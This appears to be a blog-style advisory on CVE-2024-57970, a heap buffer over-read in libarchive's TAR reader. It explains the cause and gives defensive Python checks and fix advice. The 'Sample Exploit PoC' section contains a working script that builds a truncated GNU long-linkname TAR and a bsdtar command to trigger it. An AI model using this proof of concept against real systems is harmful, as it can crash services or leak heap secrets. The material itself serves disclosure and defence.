CVE-2024-57970 - Heap Buffer Over-read in libarchive’s TAR Reader Can Leak Data

CVE-2024-57970 is a recently disclosed vulnerability in libarchive (through version 3.7.7). It can make applications that read certain TAR files leak heap memory contents or crash. The bug only triggers on specially crafted TAR archives that are truncated in the middle of a GNU "long linkname" entry. If you use libarchive to process TAR files (for example through bsdtar or through bindings in other programming languages), you should pay attention.

What’s the Problem?

The bug lives in the header_gnu_longlink function in archive_read_support_format_tar.c. Classic TAR headers limit file names and link targets to 100 bytes, so GNU tar stores a longer link target in a separate pseudo-entry (typeflag 'K') placed just before the real entry. header_gnu_longlink is the function that reads this pseudo-entry.

However, if the archive ends partway through the long linkname data, libarchive does not handle the truncation correctly: it does not verify that it actually received the expected number of bytes. As a result, it can read past the end of the valid data in its heap buffer and expose whatever happens to lie there. This is called a _heap-based buffer over-read_.
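Python cannot over-read real memory, but the effect can be modeled. The sketch below is a toy model, not libarchive code: a bytearray stands in for the heap, holding a 16-byte link-name buffer followed directly by unrelated "secret" bytes. A reader that trusts the declared length instead of the number of bytes actually received returns the neighboring data; the checked variant refuses.

```python
# Toy model of a heap-based buffer over-read (not libarchive code).
# A bytearray stands in for the heap: a 16-byte linkname buffer followed
# directly by unrelated data owned by another part of the program.
BUF_LEN = 16
HEAP = bytearray(BUF_LEN) + bytearray(b'SECRET-API-KEY=42')


def fill_buffer(data):
    """Copy up to BUF_LEN bytes from the archive; return how many were copied."""
    n = min(len(data), BUF_LEN)
    HEAP[0:n] = data[:n]
    return n


def naive_read(declared_size):
    # BUG: trusts the size from the header, not the number of bytes copied
    return bytes(HEAP[0:declared_size])


def checked_read(declared_size, bytes_read):
    # FIX: refuse sizes larger than the buffer or larger than what was read
    if declared_size > BUF_LEN or bytes_read < declared_size:
        raise ValueError('refusing to read %d bytes (buffer %d, got %d)'
                         % (declared_size, BUF_LEN, bytes_read))
    return bytes(HEAP[0:declared_size])


n = fill_buffer(b'AAAA')   # the truncated archive supplied only 4 bytes
print(naive_read(33))      # output includes b'SECRET-API-KEY=42'
```

In real C code there is no bounds check at all on the naive path, which is why the neighboring heap bytes come back silently instead of raising an error.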

Why Does This Happen?

The header of the longlink pseudo-entry declares how many bytes of link name follow, and that body is padded up to a multiple of 512 bytes. A malicious archive can declare a full body but end before supplying it. If the reader does not notice the truncation, it goes on to process bytes beyond what it actually read. Those bytes may be leftover heap contents, possibly including data from elsewhere in the process, so the result is unpredictable and potentially dangerous.
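To make the "declared size" concrete: in the standard TAR layout the body length is stored as octal text in the 12-byte size field at offset 124 of the 512-byte header. A minimal sketch of how a reader derives how many bytes it should expect (the helper names are illustrative, and GNU's base-256 encoding for very large sizes is deliberately not handled):

```python
BLOCK = 512  # TAR headers and bodies are laid out in 512-byte blocks


def parse_size_field(header):
    """Decode the octal size field (bytes 124..135) of a 512-byte TAR header.

    Assumes plain octal text; GNU base-256 sizes are not supported here.
    """
    raw = header[124:136].split(b'\0', 1)[0].strip()
    return int(raw, 8) if raw else 0


def padded_length(size):
    """Round a body size up to the next multiple of the 512-byte block."""
    return (size + BLOCK - 1) // BLOCK * BLOCK
```

For example, a size field of `00000000144` means a 100-byte link name, so the reader must find `padded_length(100) == 512` bytes of body in the file. An archive that ends before those 512 bytes is truncated.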

Here is simplified, illustrative pseudocode of the dangerous pattern (not the literal code from archive_read_support_format_tar.c):

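// Illustrative pseudocode only; process_linkname() is hypothetical.
// The GNU longlink header declares that 'size' bytes of link name follow.
ssize_t bytes_read = archive_read_data(a, linkname, size);

// Vulnerable pattern: the result is ignored, so on a truncated archive
// (bytes_read < size) the buffer is still treated as 'size' bytes long.
process_linkname(linkname, size);   // may read past the valid bytes

// Safe pattern (instead of the call above): a short read is fatal.
if (bytes_read < 0 || (size_t)bytes_read < size)
    return ARCHIVE_FATAL;
process_linkname(linkname, size);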

process_linkname() (a stand-in for whatever consumes the name) may then copy or scan memory beyond the bytes_read bytes that are actually valid, which is exactly the buffer over-read.
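The same defensive idea in Python, as a sketch: read_exact, read_long_linkname, and TruncatedArchive are hypothetical names, and this is not how libarchive is structured internally. The point is that a short read becomes an error instead of a partially filled buffer handed to later code.

```python
import io

BLOCK = 512


class TruncatedArchive(Exception):
    """Raised when the archive ends before a declared body is complete."""


def read_exact(stream, n):
    """Read exactly n bytes from a binary stream or raise TruncatedArchive."""
    chunks = []
    remaining = n
    while remaining > 0:
        chunk = stream.read(remaining)
        if not chunk:  # EOF before the declared amount arrived
            raise TruncatedArchive('expected %d bytes, got %d' % (n, n - remaining))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b''.join(chunks)


def read_long_linkname(stream, size):
    """Read a GNU long-linkname body of `size` bytes plus its block padding."""
    padded = (size + BLOCK - 1) // BLOCK * BLOCK
    body = read_exact(stream, padded)
    # Only the first `size` bytes are meaningful; stop at the first NUL.
    return body[:size].split(b'\0', 1)[0]
```

With `io.BytesIO(b'A' * 100)` as the stream and a declared size of 512, `read_long_linkname` raises `TruncatedArchive` rather than returning anything.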

How Can You Exploit This?

Attackers can craft a TAR file whose GNU long linkname entry declares a large body but supplies fewer bytes before the file ends. This tricks a vulnerable libarchive into reading memory beyond the data it actually received. Simply running bsdtar, or any program or library built on libarchive, to _extract_ or _list_ a malicious TAR archive can be enough to trigger the bug.

Leaked memory is often just gibberish, but it could be sensitive data from elsewhere in the process's memory, such as passwords or secret keys.

Sample Exploit PoC

Here's a quick Python example that creates a malicious TAR to trigger this bug. Its GNU long linkname header (typeflag 'K') claims a 512-byte body, but the file ends after only 100 bytes of it.

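# Create a TAR whose GNU long-linkname ('K') entry is truncated mid-body.
# Only use this against test builds of libarchive.


def octal_field(value, width):
    # TAR numeric fields: zero-padded octal digits terminated by a NUL
    return format(value, '0%do' % (width - 1)).encode('ascii') + b'\0'


def make_bad_tar(filename='bad.tar', declared_size=512, actual_size=100):
    header = bytearray(512)
    header[0:13] = b'././@LongLink'                   # GNU pseudo-entry name
    header[100:108] = octal_field(0o644, 8)           # mode
    header[108:116] = octal_field(0, 8)               # uid
    header[116:124] = octal_field(0, 8)               # gid
    header[124:136] = octal_field(declared_size, 12)  # body size we claim
    header[136:148] = octal_field(0, 12)              # mtime
    header[156:157] = b'K'                            # typeflag: long linkname
    header[257:265] = b'ustar  \0'                    # GNU magic + version
    # Checksum: sum of all header bytes with the checksum field as spaces
    header[148:156] = b' ' * 8
    checksum = sum(header)
    header[148:156] = format(checksum, '06o').encode('ascii') + b'\0 '

    with open(filename, 'wb') as f:
        f.write(bytes(header))
        # Supply fewer body bytes than declared and stop: the archive
        # ends in the middle of the long linkname.
        f.write(b'A' * actual_size)


make_bad_tar()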

Then list or extract this file with any program that uses a vulnerable libarchive, such as bsdtar:

bsdtar -tf bad.tar

Depending on the build and heap layout, this may crash, print garbage, or even display fragments of heap memory.

Who Is Affected?

- Programs using libarchive (bsdtar, including the tar shipped with FreeBSD, and some Python and Ruby tools)
- Systems that automatically process TAR files with libarchive (like security scanners, packaging systems, etc.)

How To Fix

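Upgrade libarchive to a release newer than 3.7.7, the last version listed as affected, or apply your distribution's security update (vendors sometimes backport fixes without changing the version number). If you must patch manually, archive_read_support_format_tar.c needs to treat truncation in the middle of a GNU long linkname as a fatal error instead of trusting a partially filled buffer.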
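To see which libarchive a system's bsdtar uses, `bsdtar --version` prints the libarchive version next to bsdtar's own. The sketch below assumes that output contains text of the form `libarchive X.Y.Z` (an assumption about the format, which may differ by platform) and flags anything up to 3.7.7. Because of backports, a "possibly vulnerable" result only means you should check with your vendor.

```python
import re

LAST_AFFECTED = (3, 7, 7)  # CVE-2024-57970 affects libarchive through 3.7.7


def libarchive_version(version_text):
    """Extract (major, minor, patch) from text such as `bsdtar --version` output."""
    m = re.search(r'libarchive (\d+)\.(\d+)\.(\d+)', version_text)
    if m is None:
        return None
    return tuple(int(part) for part in m.groups())


def possibly_vulnerable(version_text):
    """True if the reported version is <= 3.7.7 (vendor backports not considered)."""
    version = libarchive_version(version_text)
    return version is not None and version <= LAST_AFFECTED
```

You could feed it the output of `subprocess.run(['bsdtar', '--version'], capture_output=True, text=True).stdout`.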

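A quick-and-dirty mitigation is to avoid processing TAR files from untrusted sources with a vulnerable libarchive. Note that merely listing such an archive is enough to trigger the bug, not just extracting it.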
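If untrusted archives must still be handled before an upgrade is possible, one stopgap is to pre-screen them in a memory-safe language. The hypothetical checker below walks the 512-byte headers of a plain, uncompressed TAR and reports any GNU long-linkname ('K') entry whose declared body runs past the end of the data. It is a heuristic sketch, not a substitute for upgrading: it ignores compression, checksums, base-256 size fields, and other malformations.

```python
BLOCK = 512


def _size_field(header):
    # Octal size field at offset 124; raises ValueError if not octal
    raw = header[124:136].split(b'\0', 1)[0].strip()
    return int(raw, 8) if raw else 0


def truncated_longlinks(data):
    """Return offsets of 'K' headers whose body extends past the end of data."""
    findings = []
    offset = 0
    while offset + BLOCK <= len(data):
        header = data[offset:offset + BLOCK]
        if header == b'\0' * BLOCK:  # end-of-archive marker
            break
        try:
            size = _size_field(header)
        except ValueError:  # non-octal size: malformed, stop scanning
            break
        body_end = offset + BLOCK + (size + BLOCK - 1) // BLOCK * BLOCK
        if header[156:157] == b'K' and body_end > len(data):
            findings.append(offset)
        offset = body_end  # skip to the next header
    return findings
```

Typical use is `truncated_longlinks(open(path, 'rb').read())`, rejecting the file if the returned list is non-empty.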

References

- CVE-2024-57970 at cve.org
- libarchive GitHub
- BSDtar project page

Final Thoughts

Heap over-reads are nasty because they are often silent: the program may keep running while passing leaked bytes to its output, and the flaw is easy to overlook in code audits. This bug in libarchive is a reminder to always validate the length of any data read from files, especially when file formats can be truncated or corrupted. If you're responsible for security, patch your systems and educate users on the risks of opening TAR files from unknown sources.

Want to see the actual fix or contribute? Check the libarchive repo for patches.

Timeline

Published on: 02/16/2025 04:15:21 UTC
Last modified on: 02/18/2025 17:15:19 UTC